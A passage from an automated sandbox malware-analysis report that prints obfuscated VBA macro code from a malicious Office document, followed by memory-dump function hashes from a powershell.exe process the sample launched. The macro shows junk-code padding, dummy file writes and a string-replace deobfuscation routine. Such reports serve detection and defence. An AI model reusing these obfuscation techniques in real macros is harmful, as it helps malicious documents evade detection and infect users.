                                                                                                                              282

                                                                                                                              Open "HGXMmlZoZ.jEXaTVE.zeocvMGG" For Binary As 207

                                                                                                                              Open

                                                                                                                              283

                                                                                                                              Put # 207, , dThRBEAv

                                                                                                                              284

                                                                                                                              Close # 207

                                                                                                                              284

                                                                                                                              ZqNrvaa:

                                                                                                                              286

                                                                                                                              Goto kMzKEr

                                                                                                                              287

                                                                                                                              Dim ahjNCC as String

                                                                                                                              288

                                                                                                                              Open "ZFWwdLJFE.FcQNSnyB.yuKyrJAD" For Binary As 93

                                                                                                                              Open

                                                                                                                              289

                                                                                                                              Put # 93, , ahjNCC

                                                                                                                              290

                                                                                                                              Close # 93

                                                                                                                              290

                                                                                                                              kMzKEr:

                                                                                                                              292

                                                                                                                              Dbzgu9yuthixkrcjt = (Wj34bkji64gbgi_p)

                                                                                                                              293

                                                                                                                              Goto JXblRBK

                                                                                                                              294

                                                                                                                              Dim sCwjljF as String

                                                                                                                              295

                                                                                                                              Open "obWgmFILu.KLSrfFHDI.nylpN" For Binary As 185

                                                                                                                              Open

                                                                                                                              296

                                                                                                                              Put # 185, , sCwjljF

                                                                                                                              297

                                                                                                                              Close # 185

                                                                                                                              297

                                                                                                                              JXblRBK:

                                                                                                                              299

                                                                                                                              Goto uJknJZHFB

                                                                                                                              300

                                                                                                                              Dim WpdDxhHa as String

                                                                                                                              301

                                                                                                                              Open "DcfnrACC.XeVEC.QdSVCUJ" For Binary As 245

                                                                                                                              Open

                                                                                                                              302

                                                                                                                              Put # 245, , WpdDxhHa

                                                                                                                              303

                                                                                                                              Close # 245

                                                                                                                              303

                                                                                                                              uJknJZHFB:

                                                                                                                              305

                                                                                                                              Goto nCWvB

                                                                                                                              306

                                                                                                                              Dim NJlsEIS as String

                                                                                                                              307

                                                                                                                              Open "nYskWX.aOSpmAFIB.kCBksCD" For Binary As 209

                                                                                                                              Open

                                                                                                                              308

                                                                                                                              Put # 209, , NJlsEIS

                                                                                                                              309

                                                                                                                              Close # 209

                                                                                                                              309

                                                                                                                              nCWvB:

                                                                                                                              311

                                                                                                                              Znr2e9ewo0wtxy = Gdxyahu7r2bnouqu(Dbzgu9yuthixkrcjt)

                                                                                                                              312

                                                                                                                              Goto gvnNjywC

                                                                                                                              313

                                                                                                                              Dim RWlYF as String

                                                                                                                              314

                                                                                                                              Open "cfmqZH.yHFfXEyD.iUezXEC" For Binary As 124

                                                                                                                              Open

                                                                                                                              315

                                                                                                                              Put # 124, , RWlYF

                                                                                                                              316

                                                                                                                              Close # 124

                                                                                                                              316

                                                                                                                              gvnNjywC:

                                                                                                                              318

                                                                                                                              Goto IpXGAFACy

                                                                                                                              319

                                                                                                                              Dim WnWcBBeF as String

                                                                                                                              320

                                                                                                                              Open "dcEwJD.cZCpC.kfXrIC" For Binary As 137

                                                                                                                              Open

                                                                                                                              321

                                                                                                                              Put # 137, , WnWcBBeF

                                                                                                                              322

                                                                                                                              Close # 137

                                                                                                                              322

                                                                                                                              IpXGAFACy:

                                                                                                                              324

                                                                                                                              Goto ObUqEpuD

                                                                                                                              325

                                                                                                                              Dim uWAjsYwtG as String

                                                                                                                              326

                                                                                                                              Open "qKjdvEDq.lYfhW.eTVwADADD" For Binary As 100

                                                                                                                              Open

                                                                                                                              327

                                                                                                                              Put # 100, , uWAjsYwtG

                                                                                                                              328

                                                                                                                              Close # 100

                                                                                                                              328

                                                                                                                              ObUqEpuD:

                                                                                                                              330

                                                                                                                              Us5rvv097omc6 = Znr2e9ewo0wtxy

                                                                                                                              331

                                                                                                                              Goto ZuuLFE

                                                                                                                              332

                                                                                                                              Dim IJSGH as String

                                                                                                                              333

                                                                                                                              Open "DbRqLDGCg.nxwYCaF.sZZrJ" For Binary As 168

                                                                                                                              Open

                                                                                                                              334

                                                                                                                              Put # 168, , IJSGH

                                                                                                                              335

                                                                                                                              Close # 168

                                                                                                                              335

                                                                                                                              ZuuLFE:

                                                                                                                              337

                                                                                                                              Goto LjVfJ

                                                                                                                              338

                                                                                                                              Dim DxojDGC as String

                                                                                                                              339

                                                                                                                              Open "nRpjIJ.tkIcCAbCF.hJzbH" For Binary As 65

                                                                                                                              Open

                                                                                                                              340

                                                                                                                              Put # 65, , DxojDGC

                                                                                                                              341

                                                                                                                              Close # 65

                                                                                                                              341

                                                                                                                              LjVfJ:

                                                                                                                              343

                                                                                                                              Goto KiOKSNEG

                                                                                                                              344

                                                                                                                              Dim JHGODJK as String

                                                                                                                              345

                                                                                                                              Open "gtvUAW.KeNGGlEDI.FCFXBEHbH" For Binary As 177

                                                                                                                              Open

                                                                                                                              346

                                                                                                                              Put # 177, , JHGODJK

                                                                                                                              347

                                                                                                                              Close # 177

                                                                                                                              347

                                                                                                                              KiOKSNEG:

                                                                                                                              349

                                                                                                                              End Function

                                                                                                                              Function Gdxyahu7r2bnouqu, APIs: 8, Strings: 7, Number of lines: 39, Relevance: 22.539
                                                                                                                              APIsMeta Information

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Replace

                                                                                                                              H9dyim0o_e1y2ad

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              Open

                                                                                                                              StringsDecrypted Strings
                                                                                                                              "ZbLbn.FiqyBGPC.ROWoCHF"
                                                                                                                              "WWgXBJbAL.psfjJF.iosTZOn"
                                                                                                                              "eKLzaJBKG.eCACJBH.NfdiGiC"
                                                                                                                              "J"")(3""s2)""("
                                                                                                                              "YNveE.qehAq.fHHuGb"
                                                                                                                              "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                                                                                                                              "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                                                                                                                              LineInstructionMeta Information
                                                                                                                              2

                                                                                                                              Function Gdxyahu7r2bnouqu(G_vsoyetocf_q1hwst)

                                                                                                                              3

                                                                                                                              Goto kmOCpG

                                                                                                                              4

                                                                                                                              Dim lfjdHL as String

                                                                                                                              5

                                                                                                                              Open "ZbLbn.FiqyBGPC.ROWoCHF" For Binary As 230

                                                                                                                              Open

                                                                                                                              6

                                                                                                                              Put # 230, , lfjdHL

                                                                                                                              7

                                                                                                                              Close # 230

                                                                                                                              7

                                                                                                                              kmOCpG:

                                                                                                                              9

                                                                                                                              Goto RhecDCNb

                                                                                                                              10

                                                                                                                              Dim GLxLQDxBB as String

                                                                                                                              11

                                                                                                                              Open "WWgXBJbAL.psfjJF.iosTZOn" For Binary As 176

                                                                                                                              Open

                                                                                                                              12

                                                                                                                              Put # 176, , GLxLQDxBB

                                                                                                                              13

                                                                                                                              Close # 176

                                                                                                                              13

                                                                                                                              RhecDCNb:

                                                                                                                              15

                                                                                                                              Goto iAKfBEDC

                                                                                                                              16

                                                                                                                              Dim eYojg as String

                                                                                                                              17

                                                                                                                              Open "eKLzaJBKG.eCACJBH.NfdiGiC" For Binary As 76

                                                                                                                              Open

                                                                                                                              18

                                                                                                                              Put # 76, , eYojg

                                                                                                                              19

                                                                                                                              Close # 76

                                                                                                                              19

                                                                                                                              iAKfBEDC:

                                                                                                                              21

                                                                                                                              Gdxyahu7r2bnouqu = VBA.Replace(G_vsoyetocf_q1hwst, "J" + ")(3" + "s2)" + "(", H9dyim0o_e1y2ad)

                                                                                                                              Replace

                                                                                                                              H9dyim0o_e1y2ad

                                                                                                                              23

                                                                                                                              Goto PksXIAC

                                                                                                                              24

                                                                                                                              Dim bVAPDAD as String

                                                                                                                              25

                                                                                                                              Open "YNveE.qehAq.fHHuGb" For Binary As 214

                                                                                                                              Open

                                                                                                                              26

                                                                                                                              Put # 214, , bVAPDAD

                                                                                                                              27

                                                                                                                              Close # 214

                                                                                                                              27

                                                                                                                              PksXIAC:

                                                                                                                              29

                                                                                                                              Goto hckCCJvD

                                                                                                                              30

                                                                                                                              Dim oVlMEI as String

                                                                                                                              31

                                                                                                                              Open "UqHHHBQRG.wPBFeBYHC.BFGBerA" For Binary As 203

                                                                                                                              Open

                                                                                                                              32

                                                                                                                              Put # 203, , oVlMEI

                                                                                                                              33

                                                                                                                              Close # 203

                                                                                                                              33

                                                                                                                              hckCCJvD:

                                                                                                                              35

                                                                                                                              Goto IaIuovC

                                                                                                                              36

                                                                                                                              Dim HMJCGGAMi as String

                                                                                                                              37

                                                                                                                              Open "ObyEHIBL.hGKABcIQ.yeYrFAOmg" For Binary As 100

                                                                                                                              Open

                                                                                                                              38

                                                                                                                              Put # 100, , HMJCGGAMi

                                                                                                                              39

                                                                                                                              Close # 100

                                                                                                                              39

                                                                                                                              IaIuovC:

                                                                                                                              41

                                                                                                                              End Function

                                                                                                                              Module: UserForm1

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "UserForm1"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = False

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = False

                                                                                                                              Module: UserForm2

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "UserForm2"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = False

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = False

                                                                                                                              Module: UserForm3

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "UserForm3"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = False

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = False

                                                                                                                              Module: UserForm4

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "UserForm4"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = False

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = False

                                                                                                                              Module: UserForm5

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "UserForm5"

                                                                                                                              2

                                                                                                                              Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"

                                                                                                                              3

                                                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                                                              4

                                                                                                                              Attribute VB_Creatable = False

                                                                                                                              5

                                                                                                                              Attribute VB_PredeclaredId = True

                                                                                                                              6

                                                                                                                              Attribute VB_Exposed = False

                                                                                                                              7

                                                                                                                              Attribute VB_TemplateDerived = False

                                                                                                                              8

                                                                                                                              Attribute VB_Customizable = False

                                                                                                                              Module: Vhr7vb1s1hgs

                                                                                                                              Declaration
                                                                                                                              LineContent
                                                                                                                              1

                                                                                                                              Attribute VB_Name = "Vhr7vb1s1hgs"

                                                                                                                              Reset < >

                                                                                                                                Analysis Process: powershell.exe PID: 1320 Parent PID: 5632 powershell.exeCOMMON

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFA34A34DE5, Relevance: .5, Instructions: 519COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 80aa85eac25c2e7374c27e8cc40ef1022b4b7e525d5ba3f5a3b4dec727301f3b
                                                                                                                                • Instruction ID: 3ef941225045c224cbd88b0d70b90cc010fed6875c965c9b3457444d437e2c0e
                                                                                                                                • Opcode Fuzzy Hash: 80aa85eac25c2e7374c27e8cc40ef1022b4b7e525d5ba3f5a3b4dec727301f3b
                                                                                                                                • Instruction Fuzzy Hash: 6A029330A18A498FDB95DF5CC495AA97BF1FF6A300F248169E40DD7296DA35EC41CBC0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34B03F83, Relevance: .5, Instructions: 460COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8ff93ab899e460abe48f26b78b792243c64eb2aa752544523f3ae6ca3c2cb9a2
                                                                                                                                • Instruction ID: b21873d8ec4022f303698c83ab01ca74cd4f53684d2602f805aa82786857716b
                                                                                                                                • Opcode Fuzzy Hash: 8ff93ab899e460abe48f26b78b792243c64eb2aa752544523f3ae6ca3c2cb9a2
                                                                                                                                • Instruction Fuzzy Hash: 5BE11861A0DB8A4FEB95DB6888951B5BFE1EF57211B08C1BED80DC71D3DF1AAC049342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A3445B, Relevance: .4, Instructions: 375COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 878e1a0f619dbb95283d6574ed9e82ef7088a4354c52c5d7e0256a17429af211
                                                                                                                                • Instruction ID: 7eec4bf0470a74204a62e9102f12fecccb9b831fe30a375dad8db287636cde0d
                                                                                                                                • Opcode Fuzzy Hash: 878e1a0f619dbb95283d6574ed9e82ef7088a4354c52c5d7e0256a17429af211
                                                                                                                                • Instruction Fuzzy Hash: 48C16F31E18A4D8FDF94DF5CC495AA97BE1FF69300F248169E80DD7296DA35E881CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A33F0B, Relevance: .2, Instructions: 193COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 40832bcd65697fb4f05dc316274df5c84513c3a5eebd6e75cff8e58f95b8c2a5
                                                                                                                                • Instruction ID: ec66a08a6d6316845af9c89257e42dda513bd9e6d7260983b4b7b398122aa062
                                                                                                                                • Opcode Fuzzy Hash: 40832bcd65697fb4f05dc316274df5c84513c3a5eebd6e75cff8e58f95b8c2a5
                                                                                                                                • Instruction Fuzzy Hash: ED512631A1C7854FE74AD72C98D25A17BE0EF47320B1841FFE88ECB193E91AA846C751
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A30FD9, Relevance: .2, Instructions: 172COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 087496c268b642eff904f0c536b7a80e54def75848adf8f4ad6506267183421f
                                                                                                                                • Instruction ID: 26b916b73ab0e951fd4ce632e31531ae2cfefd66382bf70c977ab5a14c49e0ff
                                                                                                                                • Opcode Fuzzy Hash: 087496c268b642eff904f0c536b7a80e54def75848adf8f4ad6506267183421f
                                                                                                                                • Instruction Fuzzy Hash: 81513731D1CA894FE304DB18D895AA6B7E1FF86310F14C6BAE44CC7196EF29A945C781
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34B043BE, Relevance: .2, Instructions: 170COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 960ff428657f3985243c2439a705709b24e0aaf246090e2155a1243720b48fc0
                                                                                                                                • Instruction ID: 2854e0ec4a04865059caf6700ac75d041da2334e73713389ce3a780d1aea6473
                                                                                                                                • Opcode Fuzzy Hash: 960ff428657f3985243c2439a705709b24e0aaf246090e2155a1243720b48fc0
                                                                                                                                • Instruction Fuzzy Hash: 48517B8290E7C54FE3A7977848A52A5BFA09F53215B0981FBD8CDCB1E3DD09580AD363
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34B040F8, Relevance: .2, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 067e670e10abee3118a2e0f887f09e4d07dcec21beba8d7d0c10b8d85f42c2ba
                                                                                                                                • Instruction ID: 8e9f702a584e5f07e621a8bd4dd24c1b91921313776463dac32314119484971a
                                                                                                                                • Opcode Fuzzy Hash: 067e670e10abee3118a2e0f887f09e4d07dcec21beba8d7d0c10b8d85f42c2ba
                                                                                                                                • Instruction Fuzzy Hash: 2151E721A1DB9B4FEBE5DB188891178BEE1EF66211B48C4B9D80DC71E3DF19EC149342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34B023D4, Relevance: .2, Instructions: 160COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1173e57be668daa57847895e8c42be7dcc322884d8ad113ba4d59c98fdd60be8
                                                                                                                                • Instruction ID: f8b59e1d38b562caf5c29abafd948780369af98423518fecff63e3bfec90bec1
                                                                                                                                • Opcode Fuzzy Hash: 1173e57be668daa57847895e8c42be7dcc322884d8ad113ba4d59c98fdd60be8
                                                                                                                                • Instruction Fuzzy Hash: A241F762E0CB454FE39CDB5C9895278BBC1EF96311B05C1BED98DC7193DE166C0A5382
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A34E2C, Relevance: .1, Instructions: 126COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f6da2a45381d8f80739f15059a786127290df654e4c31f20d5cb081166cb685
                                                                                                                                • Instruction ID: 9972a72fd1ecdbcd91cd245fa31ab02109eee65eaf72ace8102fd5c1e62dfeed
                                                                                                                                • Opcode Fuzzy Hash: 1f6da2a45381d8f80739f15059a786127290df654e4c31f20d5cb081166cb685
                                                                                                                                • Instruction Fuzzy Hash: F331D631A2CA494FDB58EB0CC4D59B173E1FB9A315B24417DE88EC3296E926FC42C781
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A32369, Relevance: .1, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c7f6fa202644ee59e31ca58ba6e190e5cd9a35fef7b6bea7bf0a0abb06fad7ea
                                                                                                                                • Instruction ID: 7210c18f2bb4c1b4931863c5096ad329e2d08c96a54ce0d87c0d0774cb42ef90
                                                                                                                                • Opcode Fuzzy Hash: c7f6fa202644ee59e31ca58ba6e190e5cd9a35fef7b6bea7bf0a0abb06fad7ea
                                                                                                                                • Instruction Fuzzy Hash: 95212731A1890D8FDF84EF48D481EEDB7A1FB69310F244165E80DD7291DE35E881CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A33AB5, Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 02682301d9818af3e297ffc7b3cb8049b88b87a966c0fc3c293687aaaef2cf02
                                                                                                                                • Instruction ID: 68a81acf36f2cafb6fe227714c1578dd5005c223ed4c75cd96644fe2574d420d
                                                                                                                                • Opcode Fuzzy Hash: 02682301d9818af3e297ffc7b3cb8049b88b87a966c0fc3c293687aaaef2cf02
                                                                                                                                • Instruction Fuzzy Hash: 5501A73055CB0C4FD748EF0CE491AA6B3E0FB85324F10052DE58AC3251DA32E882CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34B01545, Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3c0c98d11a206343d0d1e9b30a990367af57684e613e1524733cf71416a1446
                                                                                                                                • Instruction ID: f82b329f7b70192ab5c53f496d9ff9a0c9635cd55849a82131141234acaa4978
                                                                                                                                • Opcode Fuzzy Hash: a3c0c98d11a206343d0d1e9b30a990367af57684e613e1524733cf71416a1446
                                                                                                                                • Instruction Fuzzy Hash: E8F0C812F09E1A0BF6B9971C18552B8D5D2EF9A621B88C1BBD90FD7197DD0ADC1003C2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A34039, Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1e37ccd20ab39043fde80ac97480b212534a06901c25ac50df5191e3341c673d
                                                                                                                                • Instruction ID: 010d9585532f0da273b20655a3a9f35bff930a39303fdd596bb1c07d726b5bfc
                                                                                                                                • Opcode Fuzzy Hash: 1e37ccd20ab39043fde80ac97480b212534a06901c25ac50df5191e3341c673d
                                                                                                                                • Instruction Fuzzy Hash: 69F0303276C6044EDB5CAA0CF8835B573D1E78A220B50417FF88FC2696E917B8428685
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A34F28, Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 941e497b2580f94ae07a52eceba57cd32a59111e14f713d1ebca8365561c9ff3
                                                                                                                                • Instruction ID: d8dc3bf61990e211ed1cb2283bd14ac2a3f4ded82f75c8cedf1a2cef22ef0b52
                                                                                                                                • Opcode Fuzzy Hash: 941e497b2580f94ae07a52eceba57cd32a59111e14f713d1ebca8365561c9ff3
                                                                                                                                • Instruction Fuzzy Hash: F0F0303276C6044FD75CAA0CE8929B573D1E78A224B50417EE88EC2286E916F8428685
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FFA34A30CD0, Relevance: .4, Instructions: 374COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 32980558d38d13929e6e583d7c42d80cb0a780be714cfb65d0652dd49b07bfec
                                                                                                                                • Instruction ID: da02b932d1c79d9e7e73981453f7f8ead68d3f1939ae0bfb7fba6764a782e503
                                                                                                                                • Opcode Fuzzy Hash: 32980558d38d13929e6e583d7c42d80cb0a780be714cfb65d0652dd49b07bfec
                                                                                                                                • Instruction Fuzzy Hash: 2AB1F631A2CA4A4FE368DB59D4815B1B7D1EF46310B24C5BED88EC7596EF26B8428780
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A30D87, Relevance: .2, Instructions: 248COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
